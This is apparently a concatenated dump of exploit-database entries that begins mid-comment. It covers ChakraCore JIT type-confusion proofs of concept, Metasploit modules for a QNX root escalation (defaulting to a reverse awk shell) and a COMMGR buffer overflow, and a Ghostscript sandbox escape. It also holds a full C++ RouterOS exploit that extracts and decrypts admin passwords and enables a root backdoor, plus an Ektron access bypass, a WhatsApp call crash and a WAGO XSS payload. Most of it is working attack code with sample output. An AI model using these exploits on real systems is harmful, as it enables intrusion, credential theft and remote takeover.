else if(vtable == VirtualTableInfo<JavascriptNativeFloatArray>::Address)
{
*arrayTypeIdRef = TypeIds_NativeFloatArray;
}
else
{
return nullptr;
}
if(!array)
{
array = FromVar(var);
}
return array;
Since wrapping an object with the CrossSite class replaces the vtable of the object, this can be used to bypass it.
PoC:
*/
function opt(x_obj, arr) {
arr[0] = 1.1;
x_obj.a = arr; // Replacing the vtable.
arr['leng' + 'th'] = 0; // The length changes, but the BailOutOnInvalidatedArrayHeadSegment check will think that it's not an array. So no bailout will happen.
arr[0] = 2.3023e-320;
}
let x_obj = document.body.appendChild(document.createElement('iframe')).contentWindow.eval('({})');
let arr = [1.1, 1.1];
for (let i = 0; i < 10000; i++) {
opt(x_obj, arr.concat());
}
opt(x_obj, arr);
arr[1] = {}; // in-place type conversion
alert(arr);
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Linux::Priv
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ifwatchd Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
systems by exploiting the ifwatchd suid executable.
ifwatchd allows users to specify scripts to execute using the '-A'
command line argument; however, it does not drop privileges when
executing user-supplied scripts, resulting in execution of arbitrary
commands as root.
This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
and 6.5.0 SP1 (x86).
},
'License' => MSF_LICENSE,
'Author' =>
[
'cenobyte', # Discovery and exploit
'Tim Brown', # Independent discovery
'Brendan Coles' # Metasploit
],
'References' =>
[
['CVE', '2014-2533'],
['BID', '66449'],
['EDB', '32153'],
['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
],
'DisclosureDate' => 'Mar 10 2014',
'Platform' => 'unix', # QNX
'Arch' => ARCH_CMD,
'SessionTypes' => %w(shell meterpreter),
'Targets' => [['Automatic', {}]],
'Privileged' => true,
'Payload' =>
{
'BadChars' => '',
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'gawk generic'
}
},
'DefaultOptions' =>
{
'WfsDelay' => 10,
'PAYLOAD' => 'cmd/unix/reverse_awk'
}
))
register_advanced_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def ifwatchd_path
'/sbin/ifwatchd'
end
def base_dir
datastore['WritableDir']
end
def check
unless setuid? ifwatchd_path
vprint_error "#{ifwatchd_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{ifwatchd_path} is setuid"
CheckCode::Detected
end
def exploit
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
print_status 'Writing interface arrival event script...'
cmd_exec "echo '#!/bin/sh' > #{script_path}"
cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"
cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"
exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
cmd_exec "echo \"#{exp}\" >> #{script_path}"
cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
register_file_for_cleanup script_path
cmd_exec "chmod +x '#{script_path}'"
print_status "Executing #{ifwatchd_path}..."
interface = 'lo0'
cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
'ZDI', # Initial discovery
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'CVE', '2018-10594' ],
[ 'BID', '104529' ],
[ 'ZDI', '18-586' ],
[ 'ZDI', '18-588' ],
[ 'EDB', '44965' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(502)
])
end
def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end
/*
The switch statement only handles Js::TypeIds_Array but not Js::TypeIds_NativeIntArray and Js::TypeIds_NativeFloatArray. So for example, a native float array can be considered as of type ObjectType::Object under certain circumstances where "objValueType.IsLikelyArrayOrObjectWithArray()" is not fulfilled. As it doesn't install any array type conversion check for a definite object, handling a native array as a definite object can lead to type confusion.
void
GlobOpt::UpdateObjPtrValueType(IR::Opnd * opnd, IR::Instr * instr)
{
...
if (newValueType == ValueType::Uninitialized)
{
switch (typeId)
{
default:
if (typeId > Js::TypeIds_LastStaticType)
{
Assert(typeId != Js::TypeIds_Proxy);
if (objValueType.IsLikelyArrayOrObjectWithArray())
{
// If we have likely object with array before, we can't make it definite object with array
// since we have only proved that it is an object.
// Keep the likely array or object with array.
}
else
{
newValueType = ValueType::GetObject(ObjectType::Object);
}
}
break;
case Js::TypeIds_Array:
// Because array can change type id, we can only make it definite if we are doing array check hoist
// so that implicit call will be installed between the array checks.
if (!DoArrayCheckHoist() ||
(currentBlock->loop
? !this->ImplicitCallFlagsAllowOpts(currentBlock->loop)
: !this->ImplicitCallFlagsAllowOpts(this->func)))
{
break;
}
if (objValueType.IsLikelyArrayOrObjectWithArray())
{
// If we have likely no missing values before, keep the likely, because, we haven't proven that
// the array really has no missing values
if (!objValueType.HasNoMissingValues())
{
newValueType = ValueType::GetObject(ObjectType::Array).SetArrayTypeId(typeId);
}
}
else
{
newValueType = ValueType::GetObject(ObjectType::Array).SetArrayTypeId(typeId);
}
break;
}
}
...
}
PoC:
*/
function opt(arr, arr2) {
arr[0] = 1.1;
arr2.method(arr2[0] = {});
arr[0] = 2.3023e-320;
}
Object.prototype.method = () => {};
let arr = [1.1, 2.2];
for (let i = 0; i < 100; i++) {
opt(arr, 1); // Feeding an integer to make the value type LikelyCanBeTaggedValue_Int_PrimitiveOrObject
opt(arr, arr.concat());
}
setTimeout(() => {
opt(arr, arr);
alert(arr);
}, 100); // Waiting for the JIT server to finish its job.
While documenting bug 1675, I noticed another problem with errordict in ghostscript. Full working exploit that works in the last few versions is attached, viewing it in evince, imagemagick, gimp, okular, etc should add a line to ~/.bashrc. Additionally, because nautilus will automatically invoke evince-thumbnailer without any user-interaction, just browsing a website is enough to trigger the vulnerability.
taviso@ubuntu:~$ convert exploit.jpg output.jpg
taviso@ubuntu:~$ tail -1 ~/.bashrc
echo pwned by postscript
Good news: If your distro ships gnome-desktop 3.25.90 or later and wasn't bananas enough to disable sandboxing (yes, some are really doing that, see bug 1643 ), I don't know of any way to trigger automatic exploitation. If you open the file manually, you're still in trouble though.
One of the core access control features in postscript is the ability to mark procedures executeonly, this prevents users from peeking inside system routines and getting references to powerful operators they shouldn't have access to. I have a full description of how the executeonly mechanism works in bug 1675.
Until recently you could install an error handler in errordict and if you cause an executeonly procedure to stop ("stop" is the postscript term for "throw an exception"), that would expose the faulting operator to the error handler. That is no longer possible, because errordict is ignored in the -dSAFER sandbox.
Unfortunately, the fix was incomplete, because you could still make the invocation of the errorhandler itself stop by filling up the stack with junk and making it /stackoverflow.
One way to exploit this is to find an executeonly procedure that can stop in two different ways, you trigger the first exception and then you make calling the errorhandler stop (/stackoverflow or /execoverflow will do). When that fails the operand stack is left in an inconsistent state, because ghostscript was trying to set up the errorhandler but failed.
Here is how to exploit it:
% first, fill up the stack with junk so there is only a tiny bit of room for the errorhandler
GS>0 1 300368 {} for
% We can make /switch_to_normal_marking_ops fail by making pdfopdict a non-dictionary
GS<300369>/pdfopdict null def
% call /switch_to_normal_marking_ops (which is executeonly)
GS<300369>GS_PDF_ProcSet /switch_to_normal_marking_ops get stopped
% that failed because of /typecheck writing to pdfopdict
GS<2>==
true
% And if we look at the last few elements of the saved stack...
GS<1>dup dup length 10 sub 10 getinterval ==
[300364 300365 300366 300367 300368 null /m {normal_m} --.forceput-- /typecheck]
% The failed operator is on there ready to be passed to the errorhandler.
forceput is a very powerful operator that ignores all access controls, we can extract it from the stack, and then do whatever we like.
% Lets disable SAFER and give ourselves access to the whole filesystem (including .bashrc, ssh keys, chrome cookies, everything)
systemdict /SAFER false forceput
systemdict /userparams get /PermitFileControl [(*)] forceput
systemdict /userparams get /PermitFileWriting [(*)] forceput
systemdict /userparams get /PermitFileReading [(*)] forceput
Putting it all together, here is reading /etc/passwd just to demo:
$ ./gs -dSAFER -f test.ps
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
(root:x:0:0:root:/root:/bin/bash)
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45573.zip
# Exploit Title: FileZilla 3.33 Buffer-Overflow (PoC)
# Author: Kağan Çapar
# Discovery Date: 2018-10-10
# Software Link: https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/filezilla/3.33.0-1/filezilla_3.33.0-1.debian.tar.xz
# Vendor Homepage : https://filezilla-project.org
# Tested Version: 3.33
# Tested on OS: Kali Linux 2018.3 x64
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt". Copy the content from "exploit.txt".
# Open new terminal and write "filezilla"
# Go to Bookmarks and Add bookmark or Ctrl + B
# Now paste the contents of "exploit.txt" into the fields. "Name:"
# Click "OK" after Click "Bookmarks" you will see a crash on terminal.
#!/usr/bin/python
buffer = "\x50\x48\x52" * 1300
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
/*
# Exploit Title: RouterOS Remote Rooting
# Date: 10/07/2018
# Exploit Author: Jacob Baines
# Vendor Homepage: www.mikrotik.com
# Software Link: https://mikrotik.com/download
# Version: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3
# Tested on: RouterOS Various
# CVE : CVE-2018-14847
By the Way is an exploit coded in C++ that enables a root shell on Mikrotik devices running RouterOS versions:
Longterm: 6.30.1 - 6.40.7
Stable: 6.29 - 6.42
Beta: 6.29rc1 - 6.43rc3
The exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway
The exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an "option" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user "devel" with the admin's password.
Mikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here:
https://blog.mikrotik.com/security/winbox-vulnerability.html
Note that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.
# Usage Example
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
Login failed, incorrect username or password
Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251
╔╗ ┬ ┬ ┌┬┐┬ ┬┌─┐ ╦ ╦┌─┐┬ ┬
╠╩╗└┬┘ │ ├─┤├┤ ║║║├─┤└┬┘
╚═╝ ┴ ┴ ┴ ┴└─┘ ╚╩╝┴ ┴ ┴
[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.
*/
#include <sstream>
#include <cstdlib>
#include <iostream>
#include <boost/cstdint.hpp>
#include <boost/program_options.hpp>
#include "winbox_session.hpp"
#include "winbox_message.hpp"
#include "md5.hpp"
namespace
{
const char s_version[] = "By the Way 1.0.0";
/*!
* Parses the command line arguments. The program will always use two
* parameters (ip and winbox port) but the port will default to 8291 if
* not present on the CLI
*
* \param[in] p_arg_count the number of arguments on the command line
* \param[in] p_arg_array the arguments passed on the command line
* \param[in,out] p_ip the ip address to connect to
* \param[in,out] p_winbox_port the winbox port to connect to
* \return true if we have valid ip and ports. false otherwise.
*/
bool parseCommandLine(int p_arg_count, const char* p_arg_array[],
std::string& p_ip, std::string& p_winbox_port)
{
boost::program_options::options_description description("options");
description.add_options()
("help,h", "A list of command line options")
("version,v", "Display version information")
("winbox-port,w", boost::program_options::value<std::string>()->default_value("8291"), "The winbox port")
("ip,i", boost::program_options::value<std::string>(), "The ip to connect to");
boost::program_options::variables_map argv_map;
try
{
boost::program_options::store(
boost::program_options::parse_command_line(
p_arg_count, p_arg_array, description), argv_map);
}
catch (const std::exception& e)
{
std::cerr << e.what() << "\n" << std::endl;
std::cerr << description << std::endl;
return false;
}
boost::program_options::notify(argv_map);
if (argv_map.empty() || argv_map.count("help"))
{
std::cerr << description << std::endl;
return false;
}
if (argv_map.count("version"))
{
std::cerr << "Version: " << ::s_version << std::endl;
return false;
}
if (argv_map.count("ip") && argv_map.count("winbox-port"))
{
p_ip.assign(argv_map["ip"].as<std::string>());
p_winbox_port.assign(argv_map["winbox-port"].as<std::string>());
return true;
}
else
{
std::cerr << description << std::endl;
}
return false;
}
/*!
* This function uses the file disclosure vulnerability, CVE-2018-14847, to
* download the user database from /flash/rw/store/user.dat
*
* \param[in] p_ip the address of the router to connect to
* \param[in] p_winbox_port the winbox port to connect to
* \return a string containing the user.dat data or an empty string on error
*/
std::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port)
{
std::cout << "[+] Extracting passwords from " << p_ip << ":" << p_winbox_port << std::endl;
Winbox_Session winboxSession(p_ip, p_winbox_port);
if (!winboxSession.connect())
{
std::cerr << "[!] Failed to connect to the remote host" << std::endl;
return std::string();
}
WinboxMessage msg;
msg.set_to(2, 2);
msg.set_command(7);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.add_string(1, "//./.././.././../flash/rw/store/user.dat");
winboxSession.send(msg);
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "[!] Error receiving an open file response." << std::endl;
return std::string();
}
boost::uint32_t sessionID = msg.get_session_id();
boost::uint16_t file_size = msg.get_u32(2);
if (file_size == 0)
{
std::cerr << "[!] File size is 0" << std::endl;
return std::string();
}
msg.reset();
msg.set_to(2, 2);
msg.set_command(4);
msg.set_request_id(2);
msg.set_reply_expected(true);
msg.set_session_id(sessionID);
msg.add_u32(2, file_size);
winboxSession.send(msg);
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "[!] Error receiving a file content response." << std::endl;
return std::string();
}
return msg.get_raw(0x03);
}
/*!
* Looks through the user.dat file for an enabled administrative account that
* we can use. Once a useful account is found the password is decrypted.
*
* \param[in] p_user_dat the user.dat file data
* \param[in,out] p_username stores the found admin username
* \param[in,out] p_password stores the found admin password
* \return true on success and false otherwrise
*/
bool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password)
{
std::cout << "[+] Searching for administrator credentials " << std::endl;
// the dat file is a series of nv::messages preceded by a two byte length
std::string dat(p_user_dat);
while (dat.size() > 4)
{
boost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]);
if (dat[2] != 'M' || dat[3] != '2')
{
// this is mild insanity but the .dat file messages don't line
// up properly if a new user is added or whatever.
dat.erase(0, 1);
continue;
}
dat.erase(0, 4);
length -= 4;
if (length > dat.size())
{
return false;
}
std::string entry(dat.data(), length);
dat.erase(0, length);
WinboxMessage msg;
msg.parse_binary(entry);
// we need an active admin account
// 0x2 has three groups: 1 (read), 2 (write), 3 (full)
if (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false)
{
p_username.assign(msg.get_string(1));
std::string encrypted_pass(msg.get_string(0x11));
if (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0)
{
std::string hash_this(p_username);
hash_this.append("283i4jfkai3389");
MD5 md5;
md5.update(hash_this.c_str(), hash_this.size());
md5.finalize();
std::string md5_hash(md5.getDigest());
for (std::size_t i = 0; i < encrypted_pass.size(); i++)
{
boost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()];
if (decrypted == 0)
{
// a null terminator! We did it.
return true;
}
p_password.push_back(decrypted);
}
p_password.clear();
}
}
}
return false;
}
}
/*!
* This function creates the file /pckg/option on the target. This will enable
* the developer login on Telnet and SSH. Oddly, you'll first need to log in
* to Telnet for SSH to work, but I digress...
*
* \param[in] p_ip the ip address of the router
* \param[in] p_port the port of the jsproxy we'll connect to
* \param[in] p_username the username we'll authenticate with
* \param[in] p_password the password we'll authenticate with
* \return true if we successfully created the file.
*/
bool create_file(const std::string& p_ip, const std::string& p_port,
const std::string& p_username, const std::string& p_password)
{
Winbox_Session mproxy_session(p_ip, p_port);
if (!mproxy_session.connect())
{
std::cerr << "[-] Failed to connect to the remote host" << std::endl;
return false;
}
boost::uint32_t p_session_id = 0;
if (!mproxy_session.login(p_username, p_password, p_session_id))
{
std::cerr << "[-] Login failed." << std::endl;
return false;
}
std::cout << "[+] Creating /pckg/option on " << p_ip << ":" << p_port << std::endl;
WinboxMessage msg;
msg.set_to(2, 2);
msg.set_command(1);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.set_session_id(p_session_id);
msg.add_string(1, "//./.././.././../pckg/option");
mproxy_session.send(msg);
msg.reset();
mproxy_session.receive(msg);
if (msg.has_error())
{
std::cout << "[-] " << msg.get_error_string() << std::endl;
return false;
}
std::cout << "[+] Creating /flash/nova/etc/devel-login on " << p_ip << ":" << p_port << std::endl;
msg.reset();
msg.set_to(2, 2);
msg.set_command(1);
msg.set_request_id(2);
msg.set_reply_expected(true);
msg.set_session_id(p_session_id);
msg.add_string(1, "//./.././.././../flash/nova/etc/devel-login");
mproxy_session.send(msg);
msg.reset();
mproxy_session.receive(msg);
if (msg.has_error())
{
std::cout << "[-] " << msg.get_error_string() << std::endl;
return false;
}
return true;
}
int main(int p_argc, const char** p_argv)
{
std::string ip;
std::string winbox_port;
if (!parseCommandLine(p_argc, p_argv, ip, winbox_port))
{
return EXIT_FAILURE;
}
std::cout << std::endl;
std::cout << " ╔╗ ┬ ┬ ┌┬┐┬ ┬┌─┐ ╦ ╦┌─┐┬ ┬" << std::endl;
std::cout << " ╠╩╗└┬┘ │ ├─┤├┤ ║║║├─┤└┬┘" << std::endl;
std::cout << " ╚═╝ ┴ ┴ ┴ ┴└─┘ ╚╩╝┴ ┴ ┴ " << std::endl;
std::cout << std::endl;
// step one - do the file disclosure
std::string user_dat(getPasswords(ip, winbox_port));
if (user_dat.empty())
{
return EXIT_FAILURE;
}
// step two - parse the password
std::string admin_username;
std::string admin_password;
if (!get_password(user_dat, admin_username, admin_password))
{
std::cout << "[-] Failed to find admin creds. Trying default." << std::endl;
admin_username.assign("admin");
admin_password.assign("");
}
std::cout << "[+] Using credentials - " << admin_username << ":" << admin_password << std::endl;
// step three - create the file
if (!create_file(ip, winbox_port, admin_username, admin_password))
{
return EXIT_FAILURE;
}
std::cout << "[+] There's a light on" << std::endl;
return EXIT_SUCCESS;
}
Details
================
Software: Ektron Content Management System (CMS)
Version: 9.20 SP2
Homepage: https://www.episerver.com
Advisory report: https://github.com/alt3kx/CVE-2018-12596
CVE: CVE-2018-12596
CVSS: 7.5 (HIGH: (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWE-284
Description
================
Ektron CMS 9.20 SP2 allows remote attackers to enable users.
Vulnerability
================
Ektron CMS 9.20 SP2 allows remote attackers to call aspx pages via the "activateuser.aspx" page, even if a page
is located under the /WorkArea/ path, which is forbidden (normally available exclusively for local admins).
Proof of concept Exploit
========================
Pre-requisites:
- curl command deployed (Windows or Linux)
- Burpsuite Free/Pro deployed or any other WebProxy to catch/send GET request
Step (1): Launch the BurpSuite with default paramenter then request the follwing URL:
Target: https://ektronserver.com/WorkArea/activateuser.aspx
Normally you will see a 403 Forbidden: Access denied.
Step (2): Into BurpSuite Free/Pro add the following extra Header Referer:
"Referer: ALEX;"
Step (3): The offending GET request is:
GET /WorkArea/activateuser.aspx HTTP/1.1
Host: ektronserver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Referer: ALEX;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Step (4): Test your GET request using curl command and burpsuite as following:
# curl -i -s -k -XGET "https://ektronserver.com/WorkArea/activateuser.aspx"
-H "Host: ektronserver.com"
-H "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
-H "Referer: ALEX;"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate"
-H "Connection: close"
--proxy http://127.0.0.1:8080
You should see now the following response 200 OK!:
HTTP/1.0 200 Connection established
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Now you got access to enable users, just send the repeat request into the browser using burpsuite
Have fun!
Mitigations
================
Install the latest patches available here:
PATCH ID: EKTR-508: Security enhancement for re-enabling a user
https://support.episerver.com/hc/en-us/articles/115002828112-9-2-SP2-Site-Update
Any of the below should fix CVE-2018-12596
9.3(main release)
9.2 SP2 Site CU 22
9.1 SP3 Site CU 45
9.0 SP3 Site CU 31
Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
This vulnerability will be published if we do not receive a response to this report with 10 days.
Timeline
================
2018–06–08: Discovered
2018–06–11: Retest staging environment
2018–06–12: Restes live environment
2018–06–19: Internal communication
2018–06–21: Vendor notification
2018–06–21: Vendor feedback
2018–06–29: Vendor feedback product will be patched
2018–06–29: Patch available
2018–06–29: Agrements with the vendor to publish the CVE/Advisory.
2018–07–30: Internal communication
2018–09–15: Patches tested on LAB environment.
2018–10–08: Public report
Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.
My current exploit list @exploit-db: https://www.exploit-db.com/author/?a=1074
Heap corruption can occur when the WhatsApp mobile application receives a malformed RTP packet.
08-31 15:43:50.721 9428 9713 F libc : Fatal signal 11 (SIGSEGV), code 1, fault addr 0x7104200000 in tid 9713 (Thread-11)
08-31 15:43:50.722 382 382 W : debuggerd: handling request: pid=9428 uid=10119 gid=10119 tid=9713
08-31 15:43:50.818 9720 9720 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
08-31 15:43:50.818 9720 9720 F DEBUG : Build fingerprint: 'google/angler/angler:7.1.2/N2G48H/natash11071827:userdebug/dev-keys'
08-31 15:43:50.818 9720 9720 F DEBUG : Revision: '0'
08-31 15:43:50.818 9720 9720 F DEBUG : ABI: 'arm64'
08-31 15:43:50.818 9720 9720 F DEBUG : pid: 9428, tid: 9713, name: Thread-11 >>> com.whatsapp <<<
08-31 15:43:50.818 9720 9720 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7104200000
08-31 15:43:50.819 9720 9720 F DEBUG : x0 00000071041ffde8 x1 00000071047796b0 x2 0000000000000000 x3 0000000000000030
08-31 15:43:50.819 9720 9720 F DEBUG : x4 0000000000000000 x5 0000000000000040 x6 00000071041fffd8 x7 8181818181818181
08-31 15:43:50.819 9720 9720 F DEBUG : x8 8181818181818181 x9 8181818181818181 x10 8181818181818181 x11 8181818181818181
08-31 15:43:50.819 9720 9720 F DEBUG : x12 8181818181818181 x13 8181818181818181 x14 8181818181818181 x15 0000000000000000
08-31 15:43:50.819 9720 9720 F DEBUG : x16 0000007110a468a0 x17 000000712f3b0908 x18 0000000000000000 x19 0000000000000280
08-31 15:43:50.819 9720 9720 F DEBUG : x20 00000071088744a8 x21 0000000000000280 x22 00000071256a5a28 x23 0000007104ff9b70
08-31 15:43:50.819 9720 9720 F DEBUG : x24 000000000000100d x25 000000000000120d x26 0000007104779480 x27 0000007108830828
08-31 15:43:50.819 9720 9720 F DEBUG : x28 0000000000151f80 x29 00000071043fe540 x30 000000711060a010
08-31 15:43:50.819 9720 9720 F DEBUG : sp 00000071043fe320 pc 000000712f3b0a5c pstate 0000000060000000
08-31 15:43:50.825 9720 9720 F DEBUG :
08-31 15:43:50.825 9720 9720 F DEBUG : backtrace:
08-31 15:43:50.825 9720 9720 F DEBUG : #00 pc 000000000001aa5c /system/lib64/libc.so (memcpy+340)
08-31 15:43:50.825 9720 9720 F DEBUG : #01 pc 00000000000c500c /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #02 pc 00000000000c7d60 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #03 pc 00000000000f88d4 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #04 pc 00000000000f6948 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #05 pc 00000000000f0ef4 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #06 pc 00000000000f0630 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #07 pc 00000000000eef3c /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #08 pc 00000000001272e0 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #09 pc 0000000000303d20 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #10 pc 0000000000068734 /system/lib64/libc.so (_ZL15__pthread_startPv+208)
08-31 15:43:50.825 9720 9720 F DEBUG : #11 pc 000000000001da7c /system/lib64/libc.so (__start_thread+16)
This issue can occur when a WhatsApp user accepts a call from a malicious peer. It affects both the Android and iPhone clients.
To reproduce the issue:
1) Apply the attached patch to libwhatsapp.so in the Android application using bsdiff. this patch intercepts a memcpy right before srtp_protect is called, and alters the RTP buffer. The SHA1 of the original library I used was cfdb0266cbd6877e5d146ddd59fa83ebccdd013d, and the SHA1 of the modified library is 042256f240367eaa4a096527d1afbeb56ab2eeb4.
2) Build the attached file, natalie2.c for the Android device the application is running on, and copy it to /data/data/com.whatsapp/libn.so.
3) Copy the files in the attached folder into /data/data/com.whatsapp/files so that /data/data/com.whatsapp/files/t0 is a valid location.
4) Restart WhatsApp and call the target device and pick up the call. The deivce will crash in a few seconds.
Logs from the crashes on Android and iPhone are attached. Note that I modified the Android target binary to disable WhatsApp's custom crash handling. The iPhone WhatsApp install was unmodified.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45579.zip
# Exploit Title: WAGO 750-881 01.09.18 - Cross-Site Scripting
# Date: 2018-08-30
# Exploit Author: SecuNinja (@secuninja)
# Vendor Homepage: wago.com
# Version: 01.09.18(13) and earlier
# Affected Products: Ethernet Controller 750-881 - 01.09.18(13), 01.08.01 (10)
# CVE : N/A
# Description
# WAGO 750-881 Ethernet Controller devices, versions 01.09.18(13) and before,
# have XSS in the SNMP configuration via the webserv/cplcfg/snmp.ssi
# SNMP_DESC or SNMP_LOC_SNMP_CONT field.
# PoC
# http://ip.address/webserv/cplcfg/snmp.ssi FORM fields SNMP_DESC, SNMP_LOC_SNMP_CONT
# Exploit String "<svg/onload=alert(1)>
# http-post-data:
